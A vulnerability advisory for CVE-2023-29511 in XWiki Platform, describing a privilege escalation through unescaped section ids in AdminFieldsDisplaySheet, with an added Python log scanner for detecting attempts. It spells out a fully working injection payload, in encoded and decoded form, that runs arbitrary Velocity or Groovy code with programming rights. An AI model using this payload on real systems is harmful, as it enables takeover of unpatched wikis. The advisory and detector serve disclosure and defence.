CVE-2023-29511: Privilege escalation (PR) from account/view through AdminFieldsDisplaySheet and admin.vm
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with edit rights on a page (e.g., their own user page) can execute arbitrary Groovy, Python or Velocity code in XWiki, leading to full access to the XWiki installation. The root cause is improper escaping of the section ids in XWiki.AdminFieldsDisplaySheet. This page is installed by default. The vulnerability has been patched in XWiki versions 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11.
Steps to reproduce:
Add
{{template name="admin.vm" output="false"/}}
{{display reference="XWiki.AdminFieldsDisplaySheet"/}}
to any place where you can use wiki syntax like the “about” section in your user profile as a user without programming or script rights.
Add the URL parameter section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D.
Expected results:
Some errors or nothing is displayed.
Actual result:
hello from groovy! followed by some raw HTML is displayed.
This shows that a user without script or programming rights can execute a Groovy macro and thus, in principle, gain programming rights. There is a caveat: the executed code is first converted to lowercase. While this means that much of the API is not available, there are workarounds, like using
{{velocity}}#evaluate($request.exploit){{/velocity}}
as the main exploit code and thus executing the content of a request parameter. A fully working set of parameters would be
section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%2Crequest.exploit%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&exploit=Hello+from+Velocity%21+%24hasProgramming
which results in the output Hello from Velocity! true, thus showing that we have programming rights in Velocity and no more restrictions. Without escaping, the corresponding parameter values are
{{/html}} {{async async="true" cached="false" context="doc.reference,request.exploit"}}{{velocity}}#evaluate($request.exploit){{/velocity}}{{/async}}
for section and
Hello from Velocity! $hasProgramming
for exploit.
This exploit is possible because XWiki.AdminFieldsDisplaySheet outputs $section (and other variables) without further escaping, thus allowing XWiki syntax injection, and because admin.vm can be abused to set $section from the section request parameter.
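Since the injection travels in the section request parameter, one way for an operator to spot attempts against unpatched instances is to URL-decode that parameter in access logs and look for XWiki macro syntax in it. The following is an added example, not code from the advisory or from XWiki itself: it scans constructed request lines, URL-decodes the query string, and flags any section value that is not a plain identifier or that contains macro markers such as {{groovy}}, {{velocity}} or {{/html}}. The allowlist pattern for legitimate section ids is an assumption, and the sample request lines are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request lines for demonstration; these are not real logs.
SAMPLE_REQUESTS = [
    'GET /xwiki/bin/view/XWiki/Alice?section=Users HTTP/1.1',
    'GET /xwiki/bin/admin/XWiki/XWikiPreferences?editor=globaladmin&section=Rights HTTP/1.1',
    # Decodes to: {{/html}} {{async async="true"}}{{groovy}}println("hi"){{/groovy}}{{/async}}
    'GET /xwiki/bin/view/XWiki/Alice?section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22%7D%7D'
    '%7B%7Bgroovy%7D%7Dprintln%28%22hi%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1',
    # Decodes to: {{velocity}}#evaluate($request.exploit){{/velocity}} plus a second parameter
    'GET /xwiki/bin/view/XWiki/Bob?section=%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29'
    '%7B%7B%2Fvelocity%7D%7D&exploit=%24hasProgramming HTTP/1.1',
]

# Assumption: legitimate admin section ids are plain identifiers made of letters,
# digits, dot, underscore and hyphen. Anything else is treated as suspicious.
SAFE_SECTION_ID = re.compile(r'^[A-Za-z0-9_.\-]+$')

# XWiki 2.x macro syntax: {{name ...}} to open, {{/name}} to close.
MACRO_RE = re.compile(r'\{\{\s*/?\s*([A-Za-z][\w-]*)')

# Macros that execute code or switch the rendering context (from the advisory).
SCRIPT_MACROS = {'groovy', 'velocity', 'python', 'async', 'html'}


def is_safe_section_id(value):
    """True if the section id matches the assumed allowlist of plain identifiers."""
    return bool(SAFE_SECTION_ID.match(value))


def macro_names(value):
    """Distinct, lower-cased macro names found in a decoded parameter value."""
    return sorted({m.lower() for m in MACRO_RE.findall(value)})


def inspect_request(line):
    """Return a finding dict for one request line, or None if it looks benign."""
    parts = line.split()
    if len(parts) < 2:
        return None
    target = urlsplit(parts[1])
    # parse_qs URL-decodes values, turning %7B%7B into {{ and '+' into a space.
    params = parse_qs(target.query, keep_blank_values=True)
    for section in params.get('section', []):
        if is_safe_section_id(section):
            continue
        macros = macro_names(section)
        return {
            'path': target.path,
            'section': section,
            'macros': macros,
            'script_macros': sorted(set(macros) & SCRIPT_MACROS),
        }
    return None


def scan(lines):
    """Run inspect_request over every line and keep only the findings."""
    return [finding for finding in (inspect_request(line) for line in lines) if finding]


if __name__ == '__main__':
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The allowlist check does the real work: a section id that is not a bare identifier is suspicious regardless of which macro it carries, and the macro extraction only classifies what was injected. The same allowlist, applied server-side to $section before it is rendered, is the shape of validation whose absence the advisory describes.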